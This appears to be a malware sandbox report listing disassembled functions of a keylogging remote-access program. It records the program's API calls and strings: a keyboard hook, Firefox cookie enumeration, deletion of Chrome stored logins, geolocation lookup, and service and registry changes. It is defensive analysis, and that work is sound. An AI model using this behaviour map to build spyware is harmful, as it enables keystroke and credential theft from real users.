            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: EnumServicesStatus$ErrorLastManagerOpen
            • String ID:
            • API String ID: 3587775597-0
            • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
            • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
            • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
            • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
            Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
            • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
            • FindClose.KERNEL32(00000000), ref: 0040B3BE
            • FindClose.KERNEL32(00000000), ref: 0040B3E9
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$CloseFile$FirstNext
            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
            • API String ID: 1164774033-405221262
            • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
            • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
            • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
            • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
            Function 00409340 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
            • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
            • GetLastError.KERNEL32 ref: 00409375
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
            • TranslateMessage.USER32(?), ref: 004093D2
            • DispatchMessageA.USER32(?), ref: 004093DD
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
            • String ID: Keylogger initialization failure: error $`#v
            • API String ID: 3219506041-3226811161
            • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
            • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
            • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
            • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
            Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
            • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
            • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
            • SetLastError.KERNEL32(0000000E), ref: 0041082E
              • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
            • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
            • HeapAlloc.KERNEL32(00000000), ref: 0041087C
            • SetLastError.KERNEL32(0000045A), ref: 0041098F
              • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
              • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
            • String ID: $.F
            • API String ID: 3950776272-1421728423
            • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
            • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
            • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
            • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
            Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
            Download Yara Rule
            APIs
            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
            • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressCloseCreateLibraryLoadProcsend
            • String ID: SHDeleteKeyW$Shlwapi.dll
            • API String ID: 2127411465-314212984
            • Opcode ID: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
            • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
            • Opcode Fuzzy Hash: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
            • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
            Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00446741
            • _free.LIBCMT ref: 00446765
            • _free.LIBCMT ref: 004468EC
            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
            • _free.LIBCMT ref: 00446AB8
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ByteCharMultiWide$InformationTimeZone
            • String ID:
            • API String ID: 314583886-0
            • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
            • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
            • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
            • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
            Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
              • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
              • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
            • Sleep.KERNEL32(00000BB8), ref: 0040E243
            • ExitProcess.KERNEL32 ref: 0040E2B4
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseExitOpenProcessQuerySleepValue
            • String ID: 3.8.0 Pro$override$pth_unenc$!G
            • API String ID: 2281282204-1386060931
            • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
            • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
            • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
            • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
            Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
            Download Yara Rule
            APIs
            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
            • InternetCloseHandle.WININET(00000000), ref: 00419407
            • InternetCloseHandle.WININET(00000000), ref: 0041940A
            Strings
            • http://geoplugin.net/json.gp, xrefs: 004193A2
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Internet$CloseHandleOpen$FileRead
            • String ID: http://geoplugin.net/json.gp
            • API String ID: 3121278467-91888290
            • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
            • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
            • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
            • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
            Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
            Download Yara Rule
            APIs
            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
            • GetLastError.KERNEL32 ref: 0040A999
            Strings
            • UserProfile, xrefs: 0040A95F
            • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
            • [Chrome StoredLogins not found], xrefs: 0040A9B3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DeleteErrorFileLast
            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
            • API String ID: 2018770650-1062637481
            • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
            • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
            • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
            • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
            Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
            • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
            • GetLastError.KERNEL32 ref: 00415CDB
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
            • String ID: SeShutdownPrivilege
            • API String ID: 3534403312-3733053543
            • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
            • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
            • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
            • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
            Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
            Download Yara Rule
            APIs
            • __EH_prolog.LIBCMT ref: 00408393
              • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
            • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
              • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
              • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
              • Part of subcall function 00404E06: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
            • FindClose.KERNEL32(00000000), ref: 004086F4
              • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
              • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
            • String ID:
            • API String ID: 2435342581-0
            • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
            • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
            • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
            • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
            Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32 ref: 0040949C
            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
            • GetKeyboardLayout.USER32(00000000), ref: 004094AE
            • GetKeyState.USER32(00000010), ref: 004094B8
            • GetKeyboardState.USER32(?), ref: 004094C5
            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
            • String ID:
            • API String ID: 3566172867-0
            • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
            • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
            • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
            • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
            Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ManagerStart
            • String ID:
            • API String ID: 276877138-0
            • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
            • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
            • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
            • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
            Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Find$CreateFirstNext
            • String ID: H"G$`'G$`'G
            • API String ID: 341183262-2774397156
            • Opcode ID: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
            • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
            • Opcode Fuzzy Hash: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
            • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
            Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
              • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
              • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
              • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
              • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
            • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
            • GetProcAddress.KERNEL32(00000000), ref: 00414E72
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
            • String ID: PowrProf.dll$SetSuspendState
            • API String ID: 1589313981-1420736420
            • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
            • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
            • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
            • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
            Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
            • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
            • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
            • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
            • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
            Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
            Download Yara Rule
            APIs
            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
            • wsprintfW.USER32 ref: 0040A13F
              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: EventLocalTimewsprintf
            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
            • API String ID: 1497725170-248792730
            • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
            • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
            • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
            • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
            Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
            Download Yara Rule
            APIs
            • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
            • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
            • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
            • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Resource$FindLoadLockSizeof
            • String ID: SETTINGS
            • API String ID: 3473537107-594951305
            • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
            • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
            • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
            • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
            Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
            Download Yara Rule
            APIs
            • __EH_prolog.LIBCMT ref: 004087A5
            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
            • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$File$CloseFirstH_prologNext
            • String ID:
            • API String ID: 1157919129-0
            • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
            • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
            • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
            • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
            Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
            • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
            • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
            • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
            • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
            • String ID:
            • API String ID: 745075371-0
            • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
